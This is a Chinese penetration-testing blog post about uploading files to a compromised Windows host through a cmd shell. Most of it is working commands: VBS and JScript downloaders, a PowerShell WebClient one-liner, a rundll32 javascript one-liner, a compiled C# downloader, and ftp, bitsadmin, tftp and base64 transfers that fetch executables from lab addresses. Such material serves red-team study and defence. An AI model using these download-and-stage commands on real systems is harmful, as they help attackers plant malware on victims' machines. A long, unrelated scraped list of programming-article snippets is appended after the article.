citelao

渗透技巧——通过cmd上传文件的N种方法

三好学生 · 2016/04/05 10:23

0x00 前言

在渗透测试的过程中，常常需要向目标主机上传文件，我在最近的学习测试过程中就碰到了这个问题，要求只能通过cmd shell向目标主机（Windows系统）上传文件，所以本文就对该技巧做一下总结。

图片来自于http://www.telegraph.co.uk/news/worldnews/northamerica/usa/11754089/Hacker-remotely-crashes-Jeep-from-10-miles-away.html

0x02 测试环境

OS：Win7 x86
test exe：ssss2.exe,成功运行后输出1

0x03 通用上传方法

1、 debug

debug是一个程序调试工具，功能包括：

直接输入，更改，跟踪，运行汇编语言源程序
观察操作系统的内容
查看ROM BIOS的内容
观察更改RAM内部的设置值
以扇区或文件的方式读写软盘数据

特别的是它还有一个功能可以将十六进制代码转换为可执行文件：

结合本文的目标，思路如下：

把需要上传的exe转换成十六进制hex的形式
通过echo命令将hex代码写入文件
使用debug功能将hex代码还原出exe文件

实际测试：

kali中的exe2bat.exe提供了这个功能，位于/usr/share/windows-binaries

如图

操作步骤：

kali：

 
          cd 
           /usr/share/windows-binaries 
         
          wine exe2bat.exe ssss2.exe ssss2.txt

执行后会生成ssss2.txt，将里面的内容复制粘贴到cmd命令行下依次执行

执行后会生成1.dll、123.hex、ssss.exe

如图

注：
exe2bat不支持大于64kb的文件 debug默认只支持在32位系统

如图

2、ftp

搭建好ftp服务器：

ip:192.168.174.151
文件:ssss2.exe

按顺序执行如下代码即可通过ftp来下载文件

cmd：

 
          echo 
           open 
          192.168.174.151 21>  
          ftp 
          .txt 
         
          echo 
           ftp 
          >>  
          ftp 
          .txt 
         
          echo 
           bin >>  
          ftp 
          .txt 
         
          echo 
           ftp 
          >>  
          ftp 
          .txt 
         
          echo 
           GET ssss2.exe >>  
          ftp 
          .txt 
         
          ftp 
           -s: 
          ftp 
          .txt

如图

注：
初次使用ftp下载防火墙会弹框拦截，使用前记得要先添加防火墙规则

3、vbs

vbs downloader,使用msxml2.xmlhttp和adodb.stream对象

如下代码保存为.vbs文件：

 
          Set 
           Post = CreateObject( 
          "Msxml2.XMLHTTP" 
          ) 
         
          Set 
           Shell = CreateObject( 
          "Wscript.Shell" 
          ) 
         
          Post.Open  
          "GET" 
          , 
          "http://192.168.174.145/ssss2.exe" 
          ,0 
         
          Post.Send() 
         
          Set 
           aGet = CreateObject( 
          "ADODB.Stream" 
          ) 
         
          aGet.Mode = 3 
         
          aGet.Type = 1 
         
          aGet.Open() 
         
          aGet.Write(Post.responseBody) 
         
          aGet.SaveToFile  
          "C:\test\update\ssss2.exe" 
          ,2

对应到cmd下的命令为：

 
          echo 
           Set Post = CreateObject( 
          "Msxml2.XMLHTTP" 
          ) >>download.vbs 
         
          echo 
           Set Shell = CreateObject( 
          "Wscript.Shell" 
          ) >>download.vbs 
         
          echo 
           Post.Open  
          "GET" 
          , 
          "http://192.168.174.145/ssss2.exe" 
          ,0 >>download.vbs 
         
          echo 
           Post.Send() >>download.vbs 
         
          echo 
           Set aGet = CreateObject( 
          "ADODB.Stream" 
          ) >>download.vbs 
         
          echo 
           aGet.Mode = 3 >>download.vbs 
         
          echo 
           aGet.Type = 1 >>download.vbs 
         
          echo 
           aGet.Open() >>download.vbs 
         
          echo 
           aGet.Write(Post.responseBody) >>download.vbs 
         
          echo 
           aGet.SaveToFile  
          "C:\test\update\ssss2.exe" 
          ,2 >>download.vbs

按顺序依次执行后会生成download.vbs，然后执行download.vbs即可实现下载ssss2.exe

4、powershell

cmd：

 
          powershell ( 
          new-object 
          System.Net.WebClient).DownloadFile(  
          'http://192.168.174.145/ssss2.exe' 
          , 
          'C:\test\update\ssss2.exe' 
          )

5、csc

csc.exe是微软.NET Framework 中的C#编译器，Windows系统中默认包含，可在命令行下将cs文件编译成exe

c# downloader的代码为：

 
          using 
           System.Net; 
         
          namespace 
          downloader 
         
          { 
         
          class 
          Program 
         
          { 
         
          static 
          void 
          Main( 
          string 
          [] args) 
         
          { 
         
          WebClient client =  
          new 
          WebClient(); 
         
          string 
          URLAddress =  
          @"http://192.168.174.145/ssss2.exe" 
          ; 
         
          string 
          receivePath =  
          @"C:\test\update\" 
          ; 
         
          client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName 
         
          (URLAddress)); 
         
          } 
         
          } 
         
          }

使用echo将代码依次写入文件download.cs中，然后调用csc.exe编译cs文件

执行

 
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe  
          /out 
          :C:\tes 
         
          t\update\download.exe C:\ 
          test 
          \update\download.cs

如图成功生成download.exe

注：
csc.exe的绝对路径要根据系统的.net版本来确定

6、JScript

相比于JSRat中用的Scripting.FileSystemObject

换用ADODB.Stream实现起来更加简单高效

以下代码依次保存为js文件，直接执行即可实现下载文件

 
          var 
           Object = WScript.CreateObject( 
          "MSXML2.XMLHTTP" 
          ); 
         
          Object.open( 
          "GET" 
          , 
          "http://192.168.174.145/ssss2.exe" 
          , 
          false 
          ); 
         
          Object.send(); 
         
          if 
           (Object.Status == 200) 
         
          { 
         
          var 
          Stream = WScript.CreateObject( 
          "ADODB.Stream" 
          ); 
         
          Stream.Open(); 
         
          Stream.Type = 1; 
         
          Stream.Write(Object.ResponseBody); 
         
          Stream.SaveToFile( 
          "C:\\test\\update\\ssss2.exe" 
          , 2); 
         
          Stream.Close(); 
         
          }

合并成rundll32的一句话（类似于JSRat的启动方式）：

cmd：

 
     
      
        
        
          rundll32.exe javascript: 
          "\..\mshtml,RunHTMLApplication " 
          ;document.write();Object=new%20ActiveXObject( 
          "Microsoft.XMLHTTP" 
          );Object. 
          open 
          ( 
          "GET" 
          , 
          "http://192.168.174.145/ssss2.exe" 
          , 
          false 
          );Object.send(); 
          if 
          (Object.Status==200){Stream=new%20ActiveXObject( 
          "ADODB.Stream" 
          );Stream.Open();Stream.Type=1;Stream.Write(Object.ResponseBody);Stream.SaveToFile( 
          "C:\\test\\update\\ssss2.exe" 
          ,2);Stream.Close();} 
         
 
      
 
     
   

执行后会提示没有权限，很有趣的地方，更多的细节会在以后的文章介绍

7、hta

添加最小化和自动退出hta程序的功能，执行过程中会最小化hta窗口，下载文件结束后自动退出hta程序

以下代码保存为.hta文件：

 
          "test" 
         
          WINDOWSTATE =  
          "minimize" 
          >

8、bitsadmin

bitsadmin是一个命令行工具，可用于创建下载或上传工作和监测其进展情况。xp以后的Windows系统自带

使用方法：

cmd下：

 
          bitsadmin  
          /transfer 
          n http: 
          //download 
          .sysinternals.com 
          /files/PSTools 
          .zip  C:\ 
          test 
          \update\PSTools.zip

下载成功如图：

注：
不支持https、ftp协议
使用kali的simplehttpserver作服务器会报错

9、base64

将exe先作base64加密，通过cmd上传后解密输出对exe作base64加密的方法：

（1）powershell

$PEBytes = [System.IO.File]::ReadAllBytes("C:\windows\system32\calc.exe")
$Base64Payload = [System.Convert]::ToBase64String($PEBytes)
Set-Content base64.txt -Value $Base64Payload

运行后会将C:\windows\system32\calc.exe作base64加密并输出到base64.txt

（2）c#

using System;
using System.IO;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace test1
{
    class Program
    {
        static void Main(string[] args)
        {
            byte[] AsBytes = File.ReadAllBytes(@"C:\windows\system32\calc.exe");
            String AsBase64String = Convert.ToBase64String(AsBytes);
            StreamWriter sw = new StreamWriter(@"C:\test\base64.txt");
            sw.Write(AsBase64String);
            sw.Close();
        }
    }
}

(3)eml附件

（思路由猪猪侠提供）

server2003 默认包含outlook客户端C:\Program Files\Outlook Express

运行后-新建邮件-上传附件-另存为eml格式

使用notepad打开eml邮件，可看到加密的base64代码

如图

解密base64文件并生成exe的方法：

（1）powershell

$Base64Bytes = Get-Content (base64.txt)
$PEBytes= [System.Convert]::FromBase64String($Base64Bytes)
Set-Content calc.exe -Value $PEBytes

（2）c#

using System;
using System.IO;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace test1
{
    class Program
    {
        static void Main(string[] args)
        {
            byte[] AsBytes = File.ReadAllBytes(@"C:\test\base64.txt");
            String AsBase64String = Convert.FromBase64String(AsBytes);
            StreamWriter sw = new StreamWriter(@"C:\test\calc.exe");
            sw.Write(AsBase64String);
            sw.Close();
        }
    }
}

注：读文件的操作可替换为base64代码直接写入脚本文件中

0x04 补充上传方法

以上均为系统默认包含的程序，结合以上方法并借助于第三方工具也能够实现功能

这里介绍的思路是可先通过bitsadmin来下载第三方工具，然后利用第三方工具进行传输文件

1、wget：

 
          bitsadmin  
          /transfer 
          n http: 
          //www 
          .interlog.com/~tcharron 
          /wgetwin-1_5_3_1-binary 
          .zip  C:\ 
          test 
          \update\wget.zip

运行后会下载wget的压缩包wget.zip

注：
Windows系统默认不包含解压缩zip文件的命令，但是可以通过vbs来实现解压缩zip文件

vbs实现解压缩：

以下代码保存为.vbs文件：

 
          UnZip  
          "C:\test\update\wget.zip" 
          ,"C:\test\update\wget\" 
         
          Sub 
           UnZip( 
          ByVal 
          myZipFile,  
          ByVal 
          myTargetDir) 
         
          Set 
          fso = CreateObject( 
          "Scripting.FileSystemObject" 
          ) 
         
          If 
          NOT fso.FileExists(myZipFile)  
          Then 
         
          Exit 
          Sub 
         
          ElseIf 
          fso.GetExtensionName(myZipFile) <>  
          "zip" 
          Then 
         
          Exit 
          Sub 
         
          ElseIf 
          NOT fso.FolderExists(myTargetDir)  
          Then 
         
          fso.CreateFolder(myTargetDir) 
         
          End 
          If 
         
          Set 
          objShell = CreateObject( 
          "Shell.Application" 
          ) 
         
          Set 
          objSource = objShell.NameSpace(myZipFile) 
         
          Set 
          objFolderItem = objSource.Items() 
         
          Set 
          objTarget = objShell.NameSpace(myTargetDir) 
         
          intOptions = 256 
         
          objTarget.CopyHere objFolderItem, intOptions 
         
          End 
           Sub

代码来自于http://demon.tw/programming/vbs-unzip-file.html

成功解压缩后就可通过wget.exe来传输文件

 
          C:\ 
          test 
          \update\wget\wget.exe http: 
          //192 
          .168.174.145 
          /ssss2 
          .exe

如图

2、ftfp

思路同上，先通过bitsadmin下载tftp.exe，然后利用tftp传输文件

 
          bitsadmin  
          /transfer 
          n http: 
          //www 
          .winagents.com 
          /downloads/tftp 
          .exe C:\ 
          test 
          \update\tftp.exe

下载成功后利用tftp传输文件：

 
          tftp -i 192.168.174.151 GET tftp\ssss2.exe C:\ 
          test 
          \update\ssss2.exe

注：
默认防火墙会拦截

关掉防火墙或者添加规则即可

如图

0x05 小结

本文对一些常用的通过cmd来传输文件的技巧做了整理，侧重于介绍其中较为通用简便的方法，所以并未介绍其他需要配置开发环境的实现方法，如Python、Ruby、Php等，如果你有更好的实现方法，欢迎与我交流，共同学习。

0x06 参考资料

http://ly0n.me/2015/10/21/uploading-files-to-compromised-systems/
https://blog.netspi.com/15-ways-to-download-a-file/
http://demon.tw/programming/vbs-download-file.html
http://demon.tw/programming/vbs-unzip-file.html

本文由三好学生原创并首发于乌云drops，转载请注明

你可能感兴趣的:(windows,三好大神)

Qt 自定义标题栏——QtWidgets 十年之少 Qt Widgets Qt 自定义标题栏
1.去掉标题栏，实现窗体拖动（常用）以上转载方法实现窗体拖动是通过Windows事件的；但是有时候为了跨平台这种的话就得重写，比较麻烦，所以还是采用最原始的方法：通过QWidgets的鼠标事件来实现。.h文件classQRCodeDialog:publicQDialog{Q_OBJECT...protected:voidmouseMoveEvent(QMouseEvent*event)overri
编程语言选择分析：C#、Rust、Go 与 TypeScript 编译器优化互联网搬砖老肖工具使用原力计划 c#rust golang
编程语言选择分析：C#、Rust、Go与TypeScript编译器优化在讨论编程语言的选择时，特别是针对微软的C#和Rust，以及谷歌的Go语言，以及微软试图通过Go来拯救TypeScript编译器的问题，我们可以从多个角度来分析和理解。首先，我们来逐一分析这些语言的特点和它们各自的应用场景。1.C#C#是微软开发的一种面向对象的编程语言，它是.NET框架的核心部分。C#广泛用于Windows应用
ollama 基本使用教程海上彼尚 AI ai 前端
目录1.安装OllamamacOS或LinuxWindows(WSL2)2.基础命令启动与停止更新Ollama3.模型管理下载预训练模型运行模型查看已安装模型删除模型从Modelfile创建自定义模型4.高级功能服务器模式与API多会话管理环境变量配置5.常见问题与技巧加速模型下载查看日志模型参数调整模型导出与分享Ollama是一个开源的大型语言模型服务工具，能够帮助用户在本地运行大模型。通过简单
c语言中longjmp()函数,C语言的反人类函数:setjmp和longjmp的详细剖析 weixin_39822629 c语言中longjmp()函数
我希望看这篇文章的你对C++的传统异常处理，即try...catch...throw有了解(不是WindowsSEH)，这样才能方便你最深入的理解这2个C语言的反人类函数。当然如果不了解就先看下面的“C++式的异常处理”，如果感觉自己了解了，可以直接skip看到“C语言中的模拟”。【C++式的异常处理】首先，我们写一个类，请不要想这个类有什么特别的地方，其只是为了打印出来构造和析构。classCF
sc命令在windows上将elasticsearch和kibana自动作为服务开机启动 windowselastic
sc是Windows自带的命令行工具，用于管理服务。1.创建服务：打开命令提示符，运行以下命令：sccreateElasticsearchbinPath="D:\elasticsearch\bin\elasticsearch.bat"start=auto2.启动服务：创建后，启动服务：scstartElasticsearch亲测可用
『解决ping问题』windows ubuntu 开发板三者互连如何设置指向NULL 环境&调试嵌入式
嵌入式开发中，我们经常会遇到ping问题，也就是windows主机，虚拟机和开发板之间互相ping不通的问题，看了韦东山老师关于此部分的讲解做了以下总结。1.确定虚拟机使用的网卡先来看几种应用场景：情景一：PC机使用有线网卡A直接连接开发板。这种情况下我们使用了有线网卡A最终连接了开发板，所以虚拟机要设置有线网卡A作为桥接网卡。情景二：PC机使用无线网卡A连接路由器，开发板连接到同一路由器的有线网
Win NAS 的数据传输原理分析，超级详细！ DeepSeek+NAS 家用NAS WinNAS 飞牛NAS 人工智能安卓NAS
WinNAS是一款运行在Windows系统上的NAS服务，允许用户通过手机客户端远程访问和管理电脑上的文件。为了实现这一功能，WinNAS与手机之间的数据传输过程涉及多个步骤，具体取决于手机和WinNAS电脑所处的网络环境。以下是整个数据传输过程的详细说明：1.权限认证与连接建立无论手机和WinNAS电脑是否在同一个局域网内，手机客户端在访问WinNAS之前，都需要先通过耘想公司的云服务器进行权限
在Windows系统上测试safari浏览器的兼容性大汉堡玩测试 safari 前端功能测试
文章目录前言手机端的safari浏览器能替代PC端吗在Windows上测试safari浏览器的兼容性的方法利用云服务使用虚拟机在Windows上下载虚拟机遇到的问题以及解决思路总结前言在测试网站的兼容性时需要用到safari浏览器，在没有Mac的情况下，又不想麻烦同事，那该怎样在Windows系统上使用safari浏览器呢？手机端的safari浏览器能替代PC端吗答案是不能，主要是因为以下几点：屏
cherry-studio - 多模型支持的跨平台 AI 桌面助手小众AI AI开源人工智能 AI编程
GitHub：https://github.com/CherryHQ/cherry-studio更多AI开源软件：发现分享好用的AI工具、AI开源软件、AI模型、AI变现-小众AI一款支持多种大语言模型服务的跨平台桌面客户端，兼容Windows、Linux和macOS系统。它支持主流云端模型（如OpenAI、Anthropic等）以及本地模型（如Ollama、LMStudio），能够满足文本生成、
RK35XX(3568) Android WSL ubuntu22.04 编译环境配置 hmbbPdx_ firefly-RK3288 RK驱动开发 Rk开发(RK3568)android linux
前言：装Ubuntu真机操作是很流畅但是没什么软件，装Vmware虚拟机操作卡顿配置也麻烦。那不如试一试wsl吧，命令行操作，流程又快捷wsl简介：适用于Linux的Windows子系统可让开发人员按原样运行GNU/Linux环境-包括大多数命令行工具、实用工具和应用程序-且不会产生传统虚拟机或双启动设置开销。window版本：10或11（7不支持）Ubuntu：16.04~22.04.1WSL:
Virtual Machine Platform is not enabled. Enable it using the following PowerShell script (in an admi 朋也透william docker
DockerDesktop安装指南以及Windows下WSL2和Hyper-V相关问题追查-寂寞姜大虎-博客园(cnblogs.com)https://www.cnblogs.com/qfl-blog/p/18200575
eclipse中修改svn账号密码漫漫求索者开发笔记 eclips svn账号密码 JaveHL
背景：鉴于单位的邮箱密码定时更换，svn账号又跟邮箱账号绑定，所以每次都需要改svn账号密码，最近由于一直在用androidstudio开放，偶然接触到之前的eclipse项目，想打开一下，却发现svn密码不能用了，想着改下密码，却忘了怎么修改了，教训，还是记录一下吧。步骤如下：1、首先看一下自己eclipse用的是那个版本的SVN，在windows>preference>Team>SVN在右边的
实用工具-Another Redis Desktop Manager介绍吕海洋数据库工具 redis 数据库
GitHub：https://github.com/qishibo/AnotherRedisDesktopManager/releasesGitee：AnotherRedisDesktopManager发行版-Gitee.comAnotherRedisDesktopManager是一款免费的Redis可视化管理工具，具有以下特点和功能：特点跨平台支持：兼容Windows、Mac、Linux等操作系
Neo4j GDS-02-graph-data-science 插件库安装实战笔记后端java
neo4japoc系列Neo4jAPOC-01-图数据库apoc插件介绍Neo4jAPOC-01-图数据库apoc插件安装neo4jonwindows10Neo4jAPOC-03-图数据库apoc实战使用使用Neo4jAPOC-04-图数据库apoc实战使用使用apoc.path.spanningTree最小生成树Neo4jAPOC-05-图数据库apoc实战使用使用labelFilterNeo4
Git——如何上传本地文件到自己的github仓库 Bruce_Ling github c++算法 git windows vscode
目录简介前言1、Windows下ping通github.com2、安装Git2.1配置Git2.2检查Git3、上传本地文件到远程仓库3.1创建github仓库总结简介本博文介绍了如何将本地的项目文件推送到自己远程的github仓库。前言因为程序是在ubuntu系统里面跑的，一开始是想在Ubuntu系统里面将文件上传到github仓库，通过修改hosts文件里面的github的ip地址，偶尔能在浏
Mac上传本地项目文件夹到远程Github个人仓库的方法及常见报错处理 Uzw Git Mac git github mac
最近写NER模型的同时学习参悟了一个开源的项目，做了一些Comments改了点分词规则，打算上传到个人Github仓库，上一次本地上传还是用Windows系统，换了Mac发现有一些规则不能用了，好久不用Git都忘光了…上传过程中报错无数，在此一并总结啦！文章目录Prerequisite上传本地文件夹到Github步骤报错问题描述及解决方法1.You‘veaddedanothergitreposit
【Python配置环境变量】2024最新版Python安装教程（附带详细步骤）！！！「已注销」 python 开发语言
一、Python安装1、访问官网打开浏览器，访问Python官网。2、下载Python安装包2.1、在官网首页，找到并点击“Downloads”按钮。2.2、根据您的操作系统（Windows、macOS、Linux等）选择合适的版本。对于Windows用户，通常会看到“Windowsx86-64executableinstaller”（64位）和“Windowsx86executableinsta
arp -a命令输出详解 learning-striving eNSP 网络智能路由器路由器接口计算机网络计算机网络
一、arp-a输出C:\WINDOWS\system32>arp-a接口:169.254.199.84---0x2Internet地址物理地址类型169.254.255.255ff-ff-ff-ff-ff-ff静态224.0.0.201-00-5e-00-00-02静态224.0.0.2201-00-5e-00-00-16静态224.0.0.25101-00-5e-00-00-fb静态224.0.
Neo4j GDS-04-图的中心性分析介绍后端java
neo4japoc系列Neo4jAPOC-01-图数据库apoc插件介绍Neo4jAPOC-01-图数据库apoc插件安装neo4jonwindows10Neo4jAPOC-03-图数据库apoc实战使用使用Neo4jAPOC-04-图数据库apoc实战使用使用apoc.path.spanningTree最小生成树Neo4jAPOC-05-图数据库apoc实战使用使用labelFilterNeo4
Windows使用Browser Use笔记人工智能ai开发
相关文档：https://docs.browser-use.com/quickstart首先安装UV命令行cmdpowershell-ExecutionPolicyByPass-c"irmhttps://astral.sh/uv/install.ps1|iex"设置环境变量setPath=C:\xx\.local\bin;%Path%查看版本uv-V查看可用和已安装的Python版本uvpytho
使用Jmeter进行接口测试的基本步骤有哪些？海姐软件测试 Jmeter 测试工具职场和发展面试
使用JMeter进行接口测试通常包含以下基本步骤：1.环境准备下载与安装：访问ApacheJMeter的官方网站（ApacheJMeter-ApacheJMeter™）下载适合你操作系统的JMeter版本，解压下载的压缩包到指定目录。启动JMeter：在解压后的目录中，找到bin文件夹，根据操作系统不同，双击jmeter.bat（Windows）或jmeter.sh（Linux/Mac）启动JMe
Ubuntu 上可以安装ms sqlserver?(不能上网2）修炼成精 ubuntu sqlserver linux
如果您有一台可以上网的Windows电脑，您可以利用它来下载所需的SQLServer安装包和依赖包，然后将这些包传输到无法上网的Ubuntu服务器上进行离线安装。以下是详细的步骤：步骤1：在Windows电脑上下载所需的软件包安装WSL（WindowsSubsystemforLinux）：如果您还没有安装WSL，可以按照以下步骤安装：打开PowerShell并运行以下命令以启用WSL：powers
鸿蒙保姆级教学冬冬小圆帽 harmonyos 华为
鸿蒙（HarmonyOS）是华为推出的一款面向全场景的分布式操作系统，支持手机、平板、智能穿戴、智能家居、车载设备等多种设备。鸿蒙系统的核心特点是分布式架构、一次开发多端部署和高性能。以下是从入门到大神级别的鸿蒙开发深度分析，结合代码示例，帮助你逐步掌握鸿蒙开发。1.鸿蒙开发入门1.1环境搭建鸿蒙编译器安装运行教程安装DevEcoStudio：下载并安装DevEcoStudio，这是鸿蒙官方提供的
常用的pdf技术有哪些？--笔记我不是彭于晏灬 pdf 笔记
常用的pdf技术有哪些？1.iTextPDF：iText是著名的开放项目，是用于生成PDF文档的一个java类库。通过iText不仅可以生成PDF或rtf的文档，而且可以将XML、Html文件转化为PDF文件。Openoffice：openoffice是开源软件且能在windows和linux平台下运行，可以灵活的将word或者Excel转化为PDF文档。JasperReport：是一个强大、灵活
Onlyoffice 更新字体 acheding 开源性能优化
复制Windows字体包，即C:\Windows\Fonts文件夹中字体。进入onlyOffice容器dockerexec-itonlyofficebash进入字体包目录cd/var/www/onlyoffice/documentserver/core-fonts删除所有字体库rm-rf\*进入字体缓存目录cd/var/www/onlyoffice/documentserver/fonts删除所有
cocos2dx : 解决中文乱码问题 ^随风~~ Cocos2d-x C++乱码
在使用cocos2dx的时候，代码里面使用了中文或者是在cocosstudio编辑器里面使用了中文，显示的时候会出现乱码问题，下面提供几个解决方案：方案一：最前面加上命令:#pragmaexecution_character_set("utf-8")方案二：使用XML文件：问题与解决方法在windows环境下使用visualstudio开发cocos2d-x，由于visualstudio默认编码为
最完整的webpack Dll打包与采坑总结仰望星空的代码 Vue.js踩坑记 vue.js webpack dll打包打包优化
webpack已经成为前端主流的项目打包工具，对于前端开发必不可少。在前端项目依赖第三方库过多，项目比较大文件比较多时，webpack打包的速度也会被拖成蜗牛，是时候优化一下webapck的打包速度了。在优化打包速度方面有不少方法方式，其中一个比较重要的方式是DllPlugin。DllPlugin把第三方库打包成动态链接库（动态链接库：windows系统中库文件概念，这里是借用了这一概念。），Dl
Beekeeper Studio：高颜值且免费的SQL开发工具开源项目精选 sql 数据库
BeekeeperStudio是一款免费开源的SQL开发和数据库管理工具，具有美观高效、简单易用的特点。BeekeeperStudio基于Vue.js开发，遵循MIT开源协议，支持Windows、Linux以及macOS平台。Stars数17842Forks数1170主要特点安全连接：除了正常的连接，也可以使用SSL加密连接或通过SSH隧道连接；SQL自动补全：代码编辑器支持语法高亮和表名自动补全
使用 Python 的 pyttsx3 库进行文本转语音 Bingjia_Hu python 开发语言 pyttsx3
1.什么是pyttsx3？1.1pyttsx3是一个Python库，它可以将文本转换为语音。与其他文本转语音库（如gTTS）不同，pyttsx3不依赖于网络服务，它使用本地的TTS（Text-to-Speech）引擎，这使得它在离线状态下也能正常工作1.2pyttsx3支持多平台（Windows、Linux和macOS），且可以对语音的音量、语速以及语音类型等进行控制2.安装pyttsx3要使用p
都快3202年了，你还不会用Java生成计算机统一标识符 Heping_Ge2333 java
Java生成计算机统一标识符计算机统一标识符的概念什么是计算机统一标识符？计算机统一标识符就相当于每台电脑每个系统的“身份证”。它是唯一的。通常，计算机统一标识符是根据电脑的硬件情况（主板、cpu的序列号，mac地址）和系统情况（windows/linux/unix）生成的。Java语言的实现下面这段代码浅浅的实现了计算机统一标识符importlombok.Data;importlombok.ex
mongodb3.03开启认证 21jhf mongodb
下载了最新mongodb3.03版本，当使用--auth 参数命令行开启mongodb用户认证时遇到很多问题，现总结如下：（百度上搜到的基本都是老版本的，看到db.addUser的就是，请忽略） Windows下我做了一个bat文件，用来启动mongodb，命令行如下： mongod --dbpath db\data --port 27017 --directoryperdb --logp
【Spark103】Task not serializable bit1129 Serializable
Task not serializable是Spark开发过程最令人头疼的问题之一，这里记录下出现这个问题的两个实例，一个是自己遇到的，另一个是stackoverflow上看到。等有时间了再仔细探究出现Task not serialiazable的各种原因以及出现问题后如何快速定位问题的所在，至少目前阶段碰到此类问题，没有什么章法 1. package spark.exampl
你所熟知的 LRU(最近最少使用) dalan_123 java
关于LRU这个名词在很多地方或听说，或使用，接下来看下lru缓存回收的实现 1、大体的想法 a、查询出最近最晚使用的项 b、给最近的使用的项做标记通过使用链表就可以完成这两个操作，关于最近最少使用的项只需要返回链表的尾部；标记最近使用的项，只需要将该项移除并放置到头部，那么难点就出现你如何能够快速在链表定位对应的该项？这时候多
Javascript 跨域周凡杨 JavaScript jsonp 跨域 cross-domain
linux下安装apache服务器 g21121 apache
安装apache 下载windows版本apache，下载地址：http://httpd.apache.org/download.cgi 1.windows下安装apache Windows下安装apache比较简单，注意选择路径和端口即可，这里就不再赘述了。 2.linux下安装apache：下载之后上传到linux的相关目录，这里指定为/home/apach
FineReport的JS编辑框和URL地址栏语法简介老A不折腾 finereport web报表报表软件语法总结
JS编辑框： 1.FineReport的js。作为一款BS产品，browser端的JavaScript是必不可少的。 FineReport中的js是已经调用了finereport.js的。大家知道，预览报表时，报表servlet会将cpt模板转为html，在这个html的head头部中会引入FineReport的js，这个finereport.js中包含了许多内置的fun
根据STATUS信息对MySQL进行优化墙头上一根草 status
mysql 查看当前正在执行的操作，即正在执行的sql语句的方法为: show processlist 命令 mysql> show global status;可以列出MySQL服务器运行各种状态值，我个人较喜欢的用法是show status like '查询值%';一、慢查询mysql> show variab
我的spring学习笔记7-Spring的Bean配置文件给Bean定义别名 aijuans Spring 3
本文介绍如何给Spring的Bean配置文件的Bean定义别名？原始的 <bean id="business" class="onlyfun.caterpillar.device.Business"> <property name="writer"> <ref b
高性能mysql 之性能剖析 annan211 性能 mysql mysql 性能剖析剖析
1 定义性能优化 mysql服务器性能，此处定义为响应时间。在解释性能优化之前，先来消除一个误解，很多人认为，性能优化就是降低cpu的利用率或者减少对资源的使用。这是一个陷阱。资源时用来消耗并用来工作的，所以有时候消耗更多的资源能够加快查询速度，保持cpu忙绿，这是必要的。很多时候发现编译进了新版本的InnoDB之后，cpu利用率上升的很厉害，这并不
主外键和索引唯一性约束百合不是茶索引唯一性约束主外键约束联机删除
目标;第一步;创建两张表用户表和文章表第二步;发表文章 1,建表; ---用户表 BlogUsers --userID唯一的 --userName --pwd --sex create
线程的调度 bijian1013 java 多线程 thread 线程的调度 java多线程
1. Java提供一个线程调度程序来监控程序中启动后进入可运行状态的所有线程。线程调度程序按照线程的优先级决定应调度哪些线程来执行。 2. 多数线程的调度是抢占式的（即我想中断程序运行就中断，不需要和将被中断的程序协商） a)
查看日志常用命令 bijian1013 linux 命令 unix
一.日志查找方法，可以用通配符查某台主机上的所有服务器grep "关键字" /wls/applogs/custom-*/error.log 二.查看日志常用命令1.grep '关键字' error.log：在error.log中搜索'关键字'2.grep -C10 '关键字' error.log：显示关键字前后10行记录3.grep '关键字' error.l
【持久化框架MyBatis3一】MyBatis版HelloWorld bit1129 helloworld
MyBatis这个系列的文章，主要参考《Java Persistence with MyBatis 3》。样例数据本文以MySQL数据库为例，建立一个STUDENTS表，插入两条数据，然后进行单表的增删改查 CREATE TABLE STUDENTS ( stud_id int(11) NOT NULL AUTO_INCREMENT,
【Hadoop十五】Hadoop Counter bit1129 hadoop
1. 只有Map任务的Map Reduce Job File System Counters FILE: Number of bytes read=3629530 FILE: Number of bytes written=98312 FILE: Number of read operations=0 FILE: Number of lar
解决Tomcat数据连接池无法释放 ronin47 tomcat 连接池　优化
近段时间，公司的检测中心报表系统(SMC)的开发人员时不时找到我，说用户老是出现无法登录的情况。前些日子因为手头上有Jboss集群的测试工作，发现用户不能登录时，都是在Tomcat中将这个项目Reload一下就好了，不过只是治标而已，因为大概几个小时之后又会再次出现无法登录的情况。今天上午，开发人员小毛又找到我，要我协助将这个问题根治一下，拖太久用户难保不投诉。简单分析了一
java-75-二叉树两结点的最低共同父结点 bylijinnan java
import java.util.LinkedList; import java.util.List; import ljn.help.*; public class BTreeLowestParentOfTwoNodes { public static void main(String[] args) { /* * node data is stored in
行业垂直搜索引擎网页抓取项目 carlwu Lucene Nutch Heritrix Solr
公司有一个搜索引擎项目，希望各路高人有空来帮忙指导，谢谢！这是详细需求：（1）通过提供的网站地址(大概100-200个网站)，网页抓取程序能不断抓取网页和其它类型的文件（如Excel、PDF、Word、ppt及zip类型），并且程序能够根据事先提供的规则，过滤掉不相干的下载内容。（2）程序能够搜索这些抓取的内容，并能对这些抓取文件按照油田名进行分类，然后放到服务器不同的目录中。
[通讯与服务]在总带宽资源没有大幅增加之前,不适宜大幅度降低资费 comsci 资源
降低通讯服务资费，就意味着有更多的用户进入，就意味着通讯服务提供商要接待和服务更多的用户，在总体运维成本没有由于技术升级而大幅下降的情况下，这种降低资费的行为将导致每个用户的平均带宽不断下降，而享受到的服务质量也在下降，这对用户和服务商都是不利的。。。。。。。。 &nbs
Java时区转换及时间格式 Cwind java
本文介绍Java API 中 Date, Calendar, TimeZone和DateFormat的使用，以及不同时区时间相互转化的方法和原理。问题描述：向处于不同时区的服务器发请求时需要考虑时区转换的问题。譬如，服务器位于东八区（北京时间，GMT+8:00），而身处东四区的用户想要查询当天的销售记录。则需把东四区的“今天”这个时间范围转换为服务器所在时区的时间范围。
readonly,只读，不可用 dashuaifu js jsp disable readOnly readOnly
readOnly 和 readonly 不同，在做js开发时一定要注意函数大小写和jsp黄线的警告！！！我就经历过这么一件事：使用readOnly在某些浏览器或同一浏览器不同版本有的可以实现“只读”功能，有的就不行，而且函数readOnly有黄线警告！！！就这样被折磨了不短时间！！！（期间使用过disable函数，但是发现disable函数之后后台接收不到前台的的数据！！！）
LABjs、RequireJS、SeaJS 介绍 dcj3sjt126com js Web
